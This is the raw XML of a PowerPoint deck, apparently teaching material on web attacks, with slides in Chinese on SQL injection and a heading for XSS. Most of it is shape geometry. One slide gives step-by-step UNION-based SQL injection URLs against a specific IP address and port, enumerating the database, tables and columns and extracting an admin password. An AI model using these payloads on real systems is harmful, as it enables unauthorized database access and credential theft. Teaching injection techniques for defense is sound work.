                <a:cubicBezTo>
                  <a:pt x="72" y="183"/>
                  <a:pt x="70" y="182"/>
                  <a:pt x="66" y="183"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="73" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="243"/>
                  <a:pt x="73" y="244"/>
                  <a:pt x="72" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="245"/>
                  <a:pt x="71" y="246"/>
                  <a:pt x="72" y="247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74" y="248"/>
                  <a:pt x="73" y="245"/>
                  <a:pt x="73" y="243"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="73" y="249"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="249"/>
                  <a:pt x="72" y="249"/>
                  <a:pt x="71" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="251"/>
                  <a:pt x="71" y="252"/>
                  <a:pt x="71" y="253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="253"/>
                  <a:pt x="72" y="252"/>
                  <a:pt x="73" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="251"/>
                  <a:pt x="73" y="251"/>
                  <a:pt x="73" y="249"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="59" y="184"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="195"/>
                  <a:pt x="55" y="210"/>
                  <a:pt x="54" y="223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="239"/>
                  <a:pt x="51" y="254"/>
                  <a:pt x="49" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="272"/>
                  <a:pt x="51" y="275"/>
                  <a:pt x="54" y="276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="271"/>
                  <a:pt x="55" y="265"/>
                  <a:pt x="56" y="259"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="256"/>
                  <a:pt x="56" y="252"/>
                  <a:pt x="57" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="226"/>
                  <a:pt x="62" y="206"/>
                  <a:pt x="64" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="183"/>
                  <a:pt x="64" y="183"/>
                  <a:pt x="64" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="183"/>
                  <a:pt x="59" y="183"/>
                  <a:pt x="59" y="184"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="31" y="131"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="129"/>
                  <a:pt x="31" y="126"/>
                  <a:pt x="31" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="122"/>
                  <a:pt x="30" y="120"/>
                  <a:pt x="30" y="118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="109"/>
                  <a:pt x="30" y="100"/>
                  <a:pt x="29" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="109"/>
                  <a:pt x="26" y="130"/>
                  <a:pt x="24" y="145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="154"/>
                  <a:pt x="21" y="164"/>
                  <a:pt x="21" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="173"/>
                  <a:pt x="28" y="174"/>
                  <a:pt x="32" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="158"/>
                  <a:pt x="31" y="144"/>
                  <a:pt x="31" y="131"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9" y="265"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="263"/>
                  <a:pt x="9" y="262"/>
                  <a:pt x="10" y="260"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="256"/>
                  <a:pt x="11" y="253"/>
                  <a:pt x="11" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="228"/>
                  <a:pt x="17" y="204"/>
                  <a:pt x="18" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="181"/>
                  <a:pt x="16" y="176"/>
                  <a:pt x="16" y="174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17" y="173"/>
                  <a:pt x="18" y="173"/>
                  <a:pt x="19" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="162"/>
                  <a:pt x="21" y="150"/>
                  <a:pt x="23" y="141"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="139"/>
                  <a:pt x="24" y="136"/>
                  <a:pt x="24" y="133"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="116"/>
                  <a:pt x="28" y="97"/>
                  <a:pt x="28" y="80"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="77"/>
                  <a:pt x="30" y="73"/>
                  <a:pt x="30" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="65"/>
                  <a:pt x="29" y="62"/>
                  <a:pt x="28" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="67"/>
                  <a:pt x="26" y="75"/>
                  <a:pt x="26" y="83"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="88"/>
                  <a:pt x="24" y="93"/>
                  <a:pt x="24" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="113"/>
                  <a:pt x="20" y="130"/>
                  <a:pt x="19" y="141"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="144"/>
                  <a:pt x="18" y="146"/>
                  <a:pt x="18" y="149"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="168"/>
                  <a:pt x="13" y="185"/>
                  <a:pt x="12" y="203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="203"/>
                  <a:pt x="12" y="204"/>
                  <a:pt x="12" y="205"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="212"/>
                  <a:pt x="10" y="218"/>
                  <a:pt x="9" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="226"/>
                  <a:pt x="9" y="228"/>
                  <a:pt x="9" y="229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="232"/>
                  <a:pt x="8" y="232"/>
                  <a:pt x="8" y="234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="236"/>
                  <a:pt x="8" y="236"/>
                  <a:pt x="8" y="236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="237"/>
                  <a:pt x="8" y="236"/>
                  <a:pt x="7" y="237"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="239"/>
                  <a:pt x="8" y="237"/>
                  <a:pt x="8" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="248"/>
                  <a:pt x="6" y="257"/>
                  <a:pt x="4" y="267"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="268"/>
                  <a:pt x="7" y="269"/>
                  <a:pt x="8" y="269"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="268"/>
                  <a:pt x="8" y="266"/>
                  <a:pt x="9" y="265"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="27" y="192"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="188"/>
                  <a:pt x="27" y="186"/>
                  <a:pt x="28" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="183"/>
                  <a:pt x="28" y="183"/>
                  <a:pt x="28" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="183"/>
                  <a:pt x="22" y="182"/>
                  <a:pt x="20" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="188"/>
                  <a:pt x="19" y="192"/>
                  <a:pt x="18" y="197"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="218"/>
                  <a:pt x="13" y="248"/>
                  <a:pt x="11" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="271"/>
                  <a:pt x="15" y="269"/>
                  <a:pt x="18" y="269"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="245"/>
                  <a:pt x="24" y="214"/>
                  <a:pt x="27" y="192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87730" y="1454150"/>
            <a:ext cx="18827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SQL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注入攻击实例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185" y="3266440"/>
            <a:ext cx="5414010" cy="283845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4190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487680" y="1217295"/>
            <a:ext cx="5384165" cy="48875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使用order by 猜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SQL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查询语句查询多少个字段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</a:p>
          <a:p>
            <a:pPr algn="l"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先是order by 10，http://117.41.229.122:8003/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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id=1 order by 10</a:t>
            </a:r>
            <a:endParaRPr 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页面没有文章信息，使用二分法尝试，直到order by 2 时页面返回正常，那么基本确定这个查询语句，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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查询结果有两个字段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、查数据库名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http://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117.41.229.122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8003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/?id=1 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and 1=2 UNION SELECT 1,database()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用and 1=2 会导致前一个条件查询没有结果，跟后面的SELECT 1,database()进行求并集之后得到的就是SELECT 1,database()的结果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确定数据库名为maoshe。</a:t>
            </a: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、查看表名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http://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117.41.229.122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8003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/?id=1 and 1=2 union select 1,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table_name from information_schema.tables where table_schema=database()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获得表名为admin</a:t>
            </a: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、查询字段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http://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117.41.229.122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8003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?id=1 and 1=2 union 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select 1,column_name from information_schema.columns where table_name='admin';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（得到的是第一列的数据）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550" y="2130425"/>
            <a:ext cx="5413375" cy="2813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1550" y="1217295"/>
            <a:ext cx="5414645" cy="27698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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882" y="2367064"/>
            <a:ext cx="11520311" cy="1323036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX1" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX2" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY2" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX3" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY3" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX4" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX5" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX6" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY6" fmla="*/ 1076325 h 1076325"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY7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076325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7058024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1076325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1076325"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FA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025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882" y="2577070"/>
            <a:ext cx="8886240" cy="898525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535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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS跨站脚本攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="45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8989125" y="2056556"/>
            <a:ext cx="1452039" cy="1419038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX1" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX2" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-3" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX3-7" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-12" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-13" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-15" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY2-16" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX3-17" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-18" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX4-19" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY4-20" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5-21" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5-22" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-23" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-24" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-25" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-26" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-27" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-28" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-29" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-30" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-31" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-32" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-33" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-34" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX6-35" fmla="*/ 917172 w 1152000"/>
              <a:gd name="connsiteY6-36" fmla="*/ 91441 h 1154343"/>
              <a:gd name="connsiteX0-37" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-38" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-39" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-40" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-41" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-42" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-43" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-44" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-45" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-46" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-47" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-48" fmla="*/ 0 h 1154343"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0-37" y="connsiteY0-38"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1-39" y="connsiteY1-40"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2-41" y="connsiteY2-42"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3-43" y="connsiteY3-44"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX4-45" y="connsiteY4-46"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX5-47" y="connsiteY5-48"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1152000" h="1154343">
                <a:moveTo>
                  <a:pt x="825732" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1152000" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152000" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323289" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050"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10250"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67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cs"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p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53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cs"/>
              </a:rPr>
              <a:t>part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785" y="3277235"/>
            <a:ext cx="5414010" cy="2835275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4190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487680" y="1217295"/>
            <a:ext cx="5384165" cy="48875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、查询字段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http://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117.41.229.122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8003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?id=1 and 1=2 union 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select 1,column_name from information_schema.columns where table_name='admin';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（得到的是第一列的数据）</a:t>
            </a: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、查询字段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http://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117.41.229.122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8003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?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin' 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limit 2,1;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（查询第二列）</a:t>
            </a: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、查询密码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http://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117.41.229.122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8003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?id=1 and 1=2 union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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select 1,password from admin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成功获得密码</a:t>
            </a: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6785" y="2238375"/>
            <a:ext cx="5414010" cy="2839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6785" y="1217295"/>
            <a:ext cx="5414010" cy="28384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504190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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注入类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组合 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762757" y="2328767"/>
            <a:ext cx="634908" cy="636524"/>
            <a:chOff x="4576741" y="3402931"/>
            <a:chExt cx="624974" cy="624974"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="组合 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4703358" y="3541102"/>
              <a:ext cx="380528" cy="380528"/>
              <a:chOff x="5707063" y="5959475"/>
              <a:chExt cx="203200" cy="203200"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5707063" y="6010275"/>
                <a:ext cx="152400" cy="152400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 216"/>
                  <a:gd name="T1" fmla="*/ 83 h 216"/>
                  <a:gd name="T2" fmla="*/ 190 w 216"/>
                  <a:gd name="T3" fmla="*/ 83 h 216"/>
                  <a:gd name="T4" fmla="*/ 183 w 216"/>
                  <a:gd name="T5" fmla="*/ 66 h 216"/>
                  <a:gd name="T6" fmla="*/ 201 w 216"/>
                  <a:gd name="T7" fmla="*/ 49 h 216"/>
                  <a:gd name="T8" fmla="*/ 201 w 216"/>
                  <a:gd name="T9" fmla="*/ 48 h 216"/>
                  <a:gd name="T10" fmla="*/ 184 w 216"/>
                  <a:gd name="T11" fmla="*/ 31 h 216"/>
                  <a:gd name="T12" fmla="*/ 167 w 216"/>
                  <a:gd name="T13" fmla="*/ 15 h 216"/>
                  <a:gd name="T14" fmla="*/ 166 w 216"/>
                  <a:gd name="T15" fmla="*/ 15 h 216"/>
                  <a:gd name="T16" fmla="*/ 149 w 216"/>
                  <a:gd name="T17" fmla="*/ 32 h 216"/>
                  <a:gd name="T18" fmla="*/ 132 w 216"/>
                  <a:gd name="T19" fmla="*/ 25 h 216"/>
                  <a:gd name="T20" fmla="*/ 132 w 216"/>
                  <a:gd name="T21" fmla="*/ 0 h 216"/>
                  <a:gd name="T22" fmla="*/ 131 w 216"/>
                  <a:gd name="T23" fmla="*/ 0 h 216"/>
                  <a:gd name="T24" fmla="*/ 108 w 216"/>
                  <a:gd name="T25" fmla="*/ 0 h 216"/>
                  <a:gd name="T26" fmla="*/ 84 w 216"/>
                  <a:gd name="T27" fmla="*/ 0 h 216"/>
                  <a:gd name="T28" fmla="*/ 83 w 216"/>
                  <a:gd name="T29" fmla="*/ 0 h 216"/>
                  <a:gd name="T30" fmla="*/ 83 w 216"/>
                  <a:gd name="T31" fmla="*/ 25 h 216"/>
                  <a:gd name="T32" fmla="*/ 67 w 216"/>
                  <a:gd name="T33" fmla="*/ 32 h 216"/>
                  <a:gd name="T34" fmla="*/ 49 w 216"/>
                  <a:gd name="T35" fmla="*/ 15 h 216"/>
                  <a:gd name="T36" fmla="*/ 48 w 216"/>
                  <a:gd name="T37" fmla="*/ 15 h 216"/>
                  <a:gd name="T38" fmla="*/ 31 w 216"/>
                  <a:gd name="T39" fmla="*/ 31 h 216"/>
                  <a:gd name="T40" fmla="*/ 15 w 216"/>
                  <a:gd name="T41" fmla="*/ 48 h 216"/>
                  <a:gd name="T42" fmla="*/ 15 w 216"/>
                  <a:gd name="T43" fmla="*/ 49 h 216"/>
                  <a:gd name="T44" fmla="*/ 32 w 216"/>
                  <a:gd name="T45" fmla="*/ 66 h 216"/>
                  <a:gd name="T46" fmla="*/ 25 w 216"/>
                  <a:gd name="T47" fmla="*/ 83 h 216"/>
                  <a:gd name="T48" fmla="*/ 1 w 216"/>
                  <a:gd name="T49" fmla="*/ 83 h 216"/>
                  <a:gd name="T50" fmla="*/ 0 w 216"/>
                  <a:gd name="T51" fmla="*/ 84 h 216"/>
                  <a:gd name="T52" fmla="*/ 0 w 216"/>
                  <a:gd name="T53" fmla="*/ 108 h 216"/>
                  <a:gd name="T54" fmla="*/ 0 w 216"/>
                  <a:gd name="T55" fmla="*/ 131 h 216"/>
                  <a:gd name="T56" fmla="*/ 1 w 216"/>
                  <a:gd name="T57" fmla="*/ 132 h 216"/>
                  <a:gd name="T58" fmla="*/ 25 w 216"/>
                  <a:gd name="T59" fmla="*/ 132 h 216"/>
                  <a:gd name="T60" fmla="*/ 32 w 216"/>
                  <a:gd name="T61" fmla="*/ 149 h 216"/>
                  <a:gd name="T62" fmla="*/ 15 w 216"/>
                  <a:gd name="T63" fmla="*/ 166 h 216"/>
                  <a:gd name="T64" fmla="*/ 15 w 216"/>
                  <a:gd name="T65" fmla="*/ 167 h 216"/>
                  <a:gd name="T66" fmla="*/ 31 w 216"/>
                  <a:gd name="T67" fmla="*/ 184 h 216"/>
                  <a:gd name="T68" fmla="*/ 48 w 216"/>
                  <a:gd name="T69" fmla="*/ 201 h 216"/>
                  <a:gd name="T70" fmla="*/ 49 w 216"/>
                  <a:gd name="T71" fmla="*/ 201 h 216"/>
                  <a:gd name="T72" fmla="*/ 67 w 216"/>
                  <a:gd name="T73" fmla="*/ 183 h 216"/>
                  <a:gd name="T74" fmla="*/ 83 w 216"/>
                  <a:gd name="T75" fmla="*/ 190 h 216"/>
                  <a:gd name="T76" fmla="*/ 83 w 216"/>
                  <a:gd name="T77" fmla="*/ 215 h 216"/>
                  <a:gd name="T78" fmla="*/ 84 w 216"/>
                  <a:gd name="T79" fmla="*/ 216 h 216"/>
                  <a:gd name="T80" fmla="*/ 108 w 216"/>
                  <a:gd name="T81" fmla="*/ 216 h 216"/>
                  <a:gd name="T82" fmla="*/ 131 w 216"/>
                  <a:gd name="T83" fmla="*/ 216 h 216"/>
                  <a:gd name="T84" fmla="*/ 132 w 216"/>
                  <a:gd name="T85" fmla="*/ 215 h 216"/>
                  <a:gd name="T86" fmla="*/ 132 w 216"/>
                  <a:gd name="T87" fmla="*/ 190 h 216"/>
                  <a:gd name="T88" fmla="*/ 149 w 216"/>
                  <a:gd name="T89" fmla="*/ 183 h 216"/>
                  <a:gd name="T90" fmla="*/ 166 w 216"/>
                  <a:gd name="T91" fmla="*/ 201 h 216"/>
                  <a:gd name="T92" fmla="*/ 167 w 216"/>
                  <a:gd name="T93" fmla="*/ 201 h 216"/>
                  <a:gd name="T94" fmla="*/ 184 w 216"/>
                  <a:gd name="T95" fmla="*/ 184 h 216"/>
                  <a:gd name="T96" fmla="*/ 201 w 216"/>
                  <a:gd name="T97" fmla="*/ 167 h 216"/>
                  <a:gd name="T98" fmla="*/ 201 w 216"/>
                  <a:gd name="T99" fmla="*/ 166 h 216"/>
                  <a:gd name="T100" fmla="*/ 183 w 216"/>
                  <a:gd name="T101" fmla="*/ 149 h 216"/>
                  <a:gd name="T102" fmla="*/ 190 w 216"/>
                  <a:gd name="T103" fmla="*/ 132 h 216"/>
                  <a:gd name="T104" fmla="*/ 215 w 216"/>
                  <a:gd name="T105" fmla="*/ 132 h 216"/>
                  <a:gd name="T106" fmla="*/ 216 w 216"/>
                  <a:gd name="T107" fmla="*/ 131 h 216"/>
                  <a:gd name="T108" fmla="*/ 216 w 216"/>
                  <a:gd name="T109" fmla="*/ 108 h 216"/>
                  <a:gd name="T110" fmla="*/ 216 w 216"/>
                  <a:gd name="T111" fmla="*/ 84 h 216"/>
                  <a:gd name="T112" fmla="*/ 215 w 216"/>
                  <a:gd name="T113" fmla="*/ 83 h 216"/>
                  <a:gd name="T114" fmla="*/ 109 w 216"/>
                  <a:gd name="T115" fmla="*/ 143 h 216"/>
                  <a:gd name="T116" fmla="*/ 73 w 216"/>
                  <a:gd name="T117" fmla="*/ 107 h 216"/>
                  <a:gd name="T118" fmla="*/ 109 w 216"/>
                  <a:gd name="T119" fmla="*/ 71 h 216"/>
                  <a:gd name="T120" fmla="*/ 146 w 216"/>
                  <a:gd name="T121" fmla="*/ 107 h 216"/>
                  <a:gd name="T122" fmla="*/ 109 w 216"/>
                  <a:gd name="T123" fmla="*/ 14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6" h="216">
                    <a:moveTo>
                      <a:pt x="215" y="83"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="83"/>
                      <a:pt x="203" y="83"/>
